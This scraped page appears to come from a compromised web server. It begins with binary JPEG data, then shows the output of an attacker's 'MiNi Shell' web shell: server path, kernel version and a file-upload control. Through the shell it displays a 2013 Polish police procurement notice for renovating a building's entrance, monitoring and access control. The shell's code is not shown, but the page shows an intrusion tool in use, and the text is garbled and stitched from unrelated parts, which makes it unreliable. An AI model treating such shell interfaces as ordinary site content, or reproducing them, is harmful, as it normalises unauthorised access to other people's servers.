JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130404/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130404/132242-N-2013.html

<p class="kh_header"><b>Katowice: Remont wejścia, monitoringu i kontroli dostępu w budynku Samodzielnego Pododdziału Prewencji Policji w Bielsku - Białej</b><br>
<b>Numer ogłoszenia: 132242 - 2013; data zamieszczenia: 04.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji w Katowicach , ul. J. Lompy 19, 40-038 Katowice, woj. śląskie, tel. 032 2002050, faks 032 2002060.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.katowice.kwp.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont wejścia, monitoringu i kontroli dostępu w budynku Samodzielnego Pododdziału Prewencji Policji w Bielsku - Białej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego zamówienia jest:
wymiana stolarki drzwiowej, posadzek, tynków wewnętrznych, roboty malarskie, wykonanie ogrodzenia, remont bram, szlabanu, instalacji monitoringu i kontroli dostępu.
2. Szczegółowy opis przedmiotu zamówieniu i jego zakres określają: załącznik nr 3 i 4 do ogłoszenia ogłoszenia tj. Przedmiar oraz Specyfikacja Techniczna Wykonania i Odbioru Robót  
3. Zamawiający wymaga, aby gwarancja na wykonane roboty wynosiła minimum 36 miesięcy licząc od dnia odbioru końcowego. Dokumenty gwarancyjne Wykonawca przedkłada w dniu odbioru końcowego  
4. Wykonawca może powierzyć wykonanie zamówienia podwykonawcom. Na wniosku o dopuszczenie do licytacji elektronicznej oraz w formularzu ofertowym wykonawca składa oświadczenie wskazując zakres robót, jaki będzie realizował przy udziale
podwykonawcy/ów. 
5. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia
publicznego (np. konsorcjum) niezbędnym jest wskazanie we wniosku o dopuszczenie do udziału w postępowaniu, jaki zakres rzeczowy przedmiotu zamówienia będzie realizował każdy z Wykonawców występujących wspólnie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.40.00.00-1, 45.31.00.00-3, 45.31.20.00-7, 45.31.56.00-4, 45.11.12.20-6.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości 3500,00 złotych należy wnieść w terminie składania
wniosków o dopuszczenie do udziału w postępowaniu na okres 30 dni jak niżej: 1. Wadium należy wnieść w
formach określonych w art. 45 ust. 6 ustawy Prawo Zamówień Publicznych tj. w pieniądzu, poręczeniach
bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest
zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach
udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o
utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.). 2. Wadium
wnoszone w pieniądzu należy wpłacić przelewem na konto Zamawiającego tj. Komenda Wojewódzka Policji
w Katowicach Narodowy Bank Polski O/O Katowice 91 1010 1212 0050 5013 9120 0000 Zaleca się
umieszczenie dopisku - wadium dot. ZP-2380-170-15/2013. Wadium musi być wniesione najpóźniej w terminie
składania wniosków o dopuszczenie do udziału w postępowaniu tj. do dnia 15.04.2013  r. do godziny 12:00
Za skuteczne wniesienie wadium w pieniądzu Zamawiający uważa wadium, które w oznaczonym terminie tj.
najpóźniej w dniu 15.04.2013 r., o godzinie 12:00 znajdzie się na koncie Zamawiającego. 3. Wadium w innej
formie niż w ppkt. 2 należy złożyć (oryginał) w siedzibie Zamawiającego tj. KWP w Katowicach ul. J. Lompy
19, pokój 504 kasa - V piętro blik C najpóźniej w dniu 15.04.2013 r. do godziny 12.00 Kasa jest czynna w
dniach od poniedziałku do piątku w godzinach 11.00 - 13.00 Wadium ma zabezpieczać interes
Zamawiającego na okres od dnia złożenia wniosku o dopuszczenie do udziału w postępowaniu tj. od dnia
15.04.2013 r. do dnia przeprowadzenia licytacji- z uwagi na relatywny termin przeprowadzania licytacji
Zamawiający wyznacza okres ważności wadium na 30 dni tj do dnia 14.05.2013 r. i nie może zawierać
ograniczeń sprzecznych z ustawą PZP a w szczególności ograniczających możliwość zrealizowania praw
określonych w art 46 ust 4a i ust 5 ustawy PZP Kserokopię gwarancji należy dołączyć do wniosku o
dopuszczenie do udziału w postępowaniu. Brak dokumentu we wniosku o dopuszczenie do udziału w
postępowaniu nie spowoduje odrzucenia wniosku. 4. Wadium zostanie zwrócone w trybie określonym a) w
art. 46 ust. 1 z zastrzeżeniem art. 46 ust. 4a ustawy Prawo Zamówień Publicznych wszystkim Wykonawcom
niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, b) w art. 46 ust. 1a
ustawy Prawo Zamówień Publicznych Wykonawcy, którego oferta została wybrana jako najkorzystniejsza
niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego. c) w art.46 ust 2 ustawy Prawo
Zamówień Publicznych na pisemny wniosek Wykonawcy, który wycofał wniosek przed upływem terminu
składania wniosku o dopuszczenie do udziału w postępowaniu. 5. Zgodnie z art. 46 ust. 5 ustawy Prawo
Zamówień Publicznych Zamawiający zatrzymuje wadium, jeżeli Wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 2)
nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 3) zawarcie umowy w sprawie
zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 6. Zgodnie z
art.46 ust 4 a Prawa Zamówień Publicznych Zamawiający zatrzymuje wadium, jeżeli Wykonawca w
odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których
mowa w art. 25 ust.1, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego
stronie. Uwaga: W przypadku składania wniosku o dopuszczenie do udziału w postępowaniu przez
Wykonawców wspólnie ubiegających się o zamówienie, wadium wnoszone w formie innej niż w pieniądzu
musi w pozycji zobowiązanego (Wykonawcy) wskazywać wszystkich Wykonawców ubiegających się
wspólnie o zamówienie lub lidera konsorcjum jako działającego w imieniu wszystkich Wykonawców
działających w konsorcjum</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art.
22 ust. 1 ustawy Prawo Zamówień Publicznych, a w szczególności Wykonawcy, którzy posiadają
niezbędną wiedzę i doświadczenie w wykonywaniu robót odpowiadających swoim rodzajem i
wartością robotom stanowiącym przedmiot zamówienia: 1. jako roboty odpowiadające swoim
rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia Wykonawca musi
wykazać się wykonaniem: co najmniej jednej roboty ogólnobudowlanej  na kwotę co najmniej 120 000,00 złotych netto  2. Zamawiający dokona oceny
spełnienia warunków udziału w postępowaniu na podstawie załączonych do wniosku o
dopuszczenie do udziału w postępowaniu dokumentów i oświadczeń w formie spełnia, nie spełnia.
Wykonawca niespełniający warunków udziału w postępowaniu zostanie wykluczony zgodnie z art.
24 ust. 2 pkt 4 ustawy PZP. 3. Każda robota zostanie uznana jeżeli została wykonana w okresie
ostatnich pięciu lat przed upływem terminu składania wniosków o dopuszczenie do udziału w
postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,
odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot
zamówienia z podaniem ich rodzaju i wartości, daty i miejsca wykonania wg wzoru załącznika nr 5
do ogłoszenia oraz załączeniem dowodów potwierdzających, że roboty te zostały wykonane
zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (np. poświadczenie, lub inne dokumenty jeżeli z uzasadnionych przyczyno obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia). 4. Zgodnie z art.
26 ust. 2b Prawa zamówień publicznych Wykonawca może polegać na wiedzy i doświadczeniu,
potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach
finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi
stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie
dysponował zasobami niezbędnymi do realizacji zamówienia. W tym celu Wykonawca
zobligowany jest załączyć do oferty następujące dokumenty : 4.1 pisemne zobowiązanie tych
podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy
wykonywaniu zamówienia 4.2 zakresu i okresu udziału innego podmiotu przy wykonywaniu
zamówienia. W przypadku, kiedy podmiot udostępniający swoje doświadczenie Wykonawcy
będzie brał udział przy wykonaniu zamówienia oprócz zobowiązania winien przedstawić
dokumenty na potwierdzenie braku podstaw do wykluczenia z udziału w postępowaniu w zakresie
art. 24 ust.1 i 2 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art.
22 ust. 1 ustawy Prawo Zamówień Publicznych, a w szczególności Wykonawcy, którzy dysponują
osobami zdolnymi do wykonania zamówienia: 1. Wykonawca musi złożyć oświadczenie, że osoby które będą uczestniczyły w wykonywaniu zamówienia
odpowiedzialne za kierowanie robotami budowlanymi posiadają uprawnienia do pełnienia
samodzielnych funkcji technicznych w budownictwie wymagane przepisami prawa budowlanego
dla: a) Kierownika Budowy w specjalności konstrukcyjno-budowlanej.  2. Zamawiający dokona oceny spełnienia warunków
udziału w postępowaniu na podstawie załączonych do wniosku o dopuszczenie do udziału w
postępowaniu dokumentów i oświadczeń w formie spełnia, nie spełnia. Wykonawca niespełniający
warunków udziału w postępowaniu zostanie wykluczony zgodnie z art. 24 ust. 2 pkt 4 ustawy PZP.
3. Zgodnie z art. 26 ust. 2b Prawa zamówień publicznych Wykonawca może polegać na wiedzy i
doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub
zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z
nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż
będzie dysponował zasobami niezbędnymi do realizacji zamówienia. W tym celu Wykonawca
zobligowany jest załączyć do oferty następujące dokumenty : 3.1 pisemne zobowiązanie tych
podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy
wykonywaniu zamówienia 3.2 zakresu i okresu udziału innego podmiotu przy wykonywaniu
zamówienia. W przypadku, kiedy podmiot udostępniający swoje doświadczenie Wykonawcy
będzie brał udział przy wykonaniu zamówienia oprócz zobowiązania winien przedstawić
dokumenty na potwierdzenie braku podstaw do wykluczenia z udziału w postępowaniu w zakresie
art. 24 ust.1 i 2 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz oświadczeń i
dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania wymagań zamawiającego
na podstawie art. 25 ust. 1 pkt. 2 ustawy Pzp. Zamawiający dopuszcza podwykonawców. W przypadku gdy
Wykonawca przewiduje powierzenie realizacji części zamówienia podwykonawcy zobowiązany jest złożyć
stosowne oświadczenie na Wniosku o dopuszczenie do udziału w licytacji elektronicznej stanowiącym
załącznik nr 1 do ogłoszenia oraz w formularzu ofertowym stanowiącym załącznik nr 6 do ogłoszenia. 2. W
przypadku wykonawców ubiegających się wspólnie (konsorcjum) o udzielenie zamówienia publicznego
niezbędnym jest wskazanie we wniosku, jaki zakres rzeczowy przedmiotu zamówienia będzie realizował
każdy z uczestników konsorcjum. 4. Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza,
przed zawarciem umowy dostarczy Zamawiającemu wypełniony formularz ofertowy - załącznik nr 6 do
ogłoszenia wraz z szczegółowym kosztorysem ofertowym stanowiącym potwierdzenie zakresu i wyliczenia
ceny oferty wylicytowanej roboty budowlanej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W myśl art.144 ustawy PZP Zamawiający dopuszcza możliwość zmian postanowień umowy w zakresie: 1.
zmiany przepisów prawa mających wpływ na realizację przedmiotu umowy w szczególności zmiany stawki
podatku VAT. W takim przypadku cena netto poszczególnych elementów umowy pozostaje bez zmian.
Zmiana cen brutto dotyczyć będzie wyłącznie niezrealizowanej części umowy. 2. przedłużenia terminu
zakończenia robót na pisemne zgłoszenie Wykonawcy w przypadku, gdy niedotrzymanie pierwotnego
terminu było wynikiem: a) siły wyższej. Przez siłę wyższą rozumie się zdarzenie bądź połączenie zdarzeń lub
okoliczności, niezależnych od Wykonawcy, które zasadniczo utrudniają lub uniemożliwiają wykonanie
zobowiązań wynikających z umowy, a których nie można było przewidzieć ani im zapobiec lub
przezwyciężyć poprzez działanie z zachowaniem należytej staranności (między innymi konieczność
wykonania robót dodatkowych), b) przyczyn zależnych od Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> https://licytacje.uzp.gov.pl</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> http://bip.katowice.kwp.policja.gov.pl</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> 1. Wymagania formalne: 1.1. Licytacja prowadzona
będzie na platformie Urzędu Zamówień Publicznych znajdującej się na stronie https://licytacje.uzp.gov.pl 1.2.
Z platformy w pełnym zakresie mogą korzystać wyłącznie Wykonawcy zarejestrowani w systemie pod
adresem https://licytacje.uzp.gov.pl 1.3. Wykonawca, aby umożliwić Zamawiającemu dopuszczenie go do
udziału w licytacji, winien wraz z wnioskiem o dopuszczenie go do udziału w licytacji przekazać informację o
swoim loginie. Login winien być przekazany Zamawiającemu w oryginalnej pisowni tzn. z zachowaniem
pisowni dużych i małych liter, numerów, spacji itp. 1.4. W przypadku podania przez Wykonawcę
niewłaściwego loginu bądź nie przekazania go Zamawiającemu wraz z wnioskiem, Zamawiający dopuszcza
przekazanie loginu najpóźniej dwa dni przed terminem otwarcia licytacji. Brak loginu bądź brak poprawnego
loginu będzie skutkowało brakiem możliwości wzięcia udziału Wykonawcy w licytacji. 2. Wymagania
techniczne: Komputer klasy PC (lub równoważnej) spełniający wymogi techniczne określone przez
producentów przeglądarek internetowych Ms Internet Explorer w wersji 6.0 lub wyższej albo Mozilla Firefox
w wersji 2.0 lub wyższej, z zainstalowaną jedną z ww. przeglądarek lub przeglądarką równoważną,
podłączony do sieci Internet..</p>
